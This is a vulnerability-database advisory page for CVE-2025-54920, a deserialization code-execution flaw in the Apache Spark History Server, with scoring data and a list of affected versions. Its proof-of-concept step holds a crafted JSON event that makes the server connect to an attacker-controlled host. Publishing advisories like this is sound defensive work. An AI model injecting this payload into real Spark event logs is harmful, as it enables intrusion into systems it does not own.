CVE-2025-54920 | Apache Spark: Spark History Server Code Execution Vulnerability

Exp

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

Published: 2026-03-16 Last update: 2026-03-20 Assigner: [email protected] Source: [email protected]
NVD Status:AnalyzedCVE State: published
View at NVD, CVE.org, EUVD

CVE-2025-54920 is rated High Exploit Risk (73.1/100): CVSS High severity, with medium exploitation likelihood (EPSS 0.49%). 2 public exploit reference(s) are indexed (Exploit-DB). Public exploits are available—assess exposure, apply mitigations, and prioritize patching.

Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.

Public exploit references (Exploit-DB) for CVE-2025-54920

EDB-ID Source Kind Published Link
nvd_ref exploit_tag Exploit-DB ↗
nvd_ref exploit_tag Exploit-DB ↗

Exploit prediction scoring system (EPSS) score for CVE-2025-54920

EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).

# Date Old EPSS score New EPSS score Delta (New - Old)
1 2026-05-21 0.56% 0.49% -0.08%
2 2026-05-13 0.54% 0.56% +0.02%
3 2026-04-25 0.54%

Full EPSS history (6 records total)

Common vulnerability scoring system (CVSS) metrics for CVE-2025-54920

CVSS metrics for this CVE.

Base score Version Severity Vector Exploitability Impact Score source
8.8 3.1 HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:N)
Could be attacked over the internet or any normal routed network—not just someone sitting at the machine.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.
 2.8 5.9 134c704f-9b21-4f2e-91b3-4a467353bcc0

Weakness enumeration for CVE-2025-54920

GitHub Security Advisory for CVE-2025-54920

GHSA-jwp6-cvj8-fw65 · Severity: high · Ecosystem: maven — Apache Spark: Spark History Server Code Execution Vulnerability

OS Trackers for CVE-2025-54920

vendor priority summary link
redhat medium https://access.redhat.com/security/cve/CVE-2025-54920

Affected software / configurations for CVE-2025-54920

Vendor Product Version Raw CPE
apache spark < 3.5.7 cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:-:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc1:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc2:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc3:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc4:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc5:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc6:*:*:*:*:*:*
apache spark 4.0.0 cpe:2.3:a:apache:spark:4.0.0:rc7:*:*:*:*:*:*
apache spark 4.0.1 cpe:2.3:a:apache:spark:4.0.1:rc1:*:*:*:*:*:*

References for CVE-2025-54920

cvelogic Threat Intelligence